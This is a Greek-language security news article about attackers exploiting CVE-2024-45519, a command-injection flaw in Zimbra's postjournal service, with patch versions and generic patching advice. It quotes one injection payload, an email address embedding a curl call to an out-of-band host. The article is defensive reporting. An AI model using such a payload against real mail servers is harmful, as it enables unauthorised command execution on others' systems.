Ερευνητές ασφάλειας προειδοποιούν για προσπάθειες εκμετάλλευσης μιας νέας ευπάθειας που αποκαλύφθηκε στο Zimbra Collaboration της Synacor.
Η Proofpoint άρχισε να παρακολουθεί την κακόβουλη δραστηριότητα στα τέλη Σεπτεμβρίου. Οι επιτιθέμενοι προσπαθούν να εκμεταλλευτούν την ευπάθεια CVE-2024-45519 στην υπηρεσία postjournal της Zimbra. Η επιτυχής εκμετάλλευση επιτρέπει σε μη εξουσιοδοτημένους εισβολείς να εκτελούν εντολές σε επηρεαζόμενες εγκαταστάσεις.
Δείτε επίσης: HPE Aruba Networking: Διορθώνει κρίσιμες ευπάθειες σε Access Points
Η ευπάθεια διορθώθηκε από τη Zimbra στις εκδόσεις 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9 και 10.1.1 που κυκλοφόρησαν στις 4 Σεπτεμβρίου 2024. Ένας ερευνητής ασφαλείας ονόματι lebr0nli (Alan Li) φέρεται να ανακάλυψε και να ανέφερε την ευπάθεια.
Ecovacs hacked: Σκούπες ρομπότ κυνηγούσαν κατοικίδια
We, Robot event: Αποκάλυψη Cybercab robotaxi & Tesla Robovan
Ηλιακή καταιγίδα ίσως επηρεάσει την ανάκαμψη από τον τυφώνα
“Η δυνατότητα postjournal είναι προαιρετική και ίσως να μην είναι ενεργοποιημένη στα περισσότερα συστήματα, αλλά είναι απαραίτητο να εφαρμοστεί η παρεχόμενη ενημέρωση κώδικα για να αποφευχθεί η πιθανή εκμετάλλευση“, σημείωσε ο Ashish Kataria, security architect engineer της Synacor.
Αν κάποιος δεν μπορεί να εφαρμόσει άμεσα την ενημέρωση, πρέπει να καταργήσει το postjournal binary.
Οι προσπάθειες εκμετάλλευσης της ευπάθειας Zimbra φέρεται να ξεκίνησαν μια μέρα αφότου το Project Discovery δημοσίευσε τεχνικές λεπτομέρειες για το σφάλμα.
Δείτε επίσης: Η CISA προσθέτει ευπάθεια του Ivanti vTM στον Κατάλογο KEV
Η εταιρεία κυβερνοασφάλειας είπε ότι το πρόβλημα έχει τις ρίζες του στον τρόπο με τον οποίο το C-based postjournal binary χειρίζεται και αναλύει τις διευθύνσεις email των παραληπτών σε μια συνάρτηση που ονομάζεται “msg_handler()”, επιτρέποντας έτσι το command injection στην υπηρεσία που εκτελείται στη θύρα 10027, κατά τη μετάδοση ενός ειδικά διαμορφωμένου SMTP μηνύματος με ψευδή διεύθυνση (π.χ. “aabbb$(curl${IFS}oast.me)”@mail.domain.com).
Περισσότερες λεπτομέρειες για τον τρόπο λειτουργίας της επίθεσης μπορείτε να βρείτε στις αναρτήσεις της Proofpoint.
Οι χρήστες καλούνται να εφαρμόσουν άμεσα τις ενημερώσεις ασφαλείας για να προστατευτούν.
Καλύτερες πρακτικές για εφαρμογή ενημερώσεων
Οι βέλτιστες πρακτικές για την εφαρμογή ενημερώσεων λογισμικού, με σκοπό τη βελτίωση της κυβερνοασφάλειας, είναι οι εξής:
Πρώτον, είναι σημαντικό να έχετε μια καλά οργανωμένη διαδικασία διαχείρισης ενημερώσεων. Αυτό περιλαμβάνει την παρακολούθηση των διαθέσιμων ενημερώσεων, την αξιολόγηση της σημασίας τους και την προτεραιότητα της εγκατάστασής τους.
Δείτε επίσης: Ευπάθειες ασφαλείας στα Houzez WordPress Theme και Plugin
Δεύτερον, είναι σημαντικό να εφαρμόζετε τις ενημερώσεις λoγισμικού το συντομότερο δυνατόν μετά την κυκλοφορία τους. Οι ενημερώσεις περιέχουν διορθώσεις για γνωστά προβλήματα ασφαλείας, οπότε η καθυστέρηση στην εγκατάστασή τους μπορεί να εκθέσει το σύστημά σας σε κινδύνους.
Τρίτον, πρέπει να διασφαλίζετε ότι οι ενημερώσεις εγκαθίστανται σωστά και πλήρως. Αυτό περιλαμβάνει την εκτέλεση πλήρους ελέγχου συμβατότητας με το υπάρχον σύστημα, τη δημιουργία αντιγράφων ασφαλείας πριν από την εγκατάσταση και την παρακολούθηση της διαδικασίας για τυχόν σφάλματα ή προβλήματα.
Τέλος, είναι σημαντικό να διατηρείτε το λογισμικό σας ενημερωμένο συνεχώς. Οι επιθέσεις και οι απειλές στην κυβερνοασφάλεια εξελίσσονται συνεχώς, οπότε η ενημέρωση του λογισμικού σας είναι ζωτικής σημασίας για τη διατήρηση της ασφάλειας του συστήματός σας.
Πηγή: thehackernews.com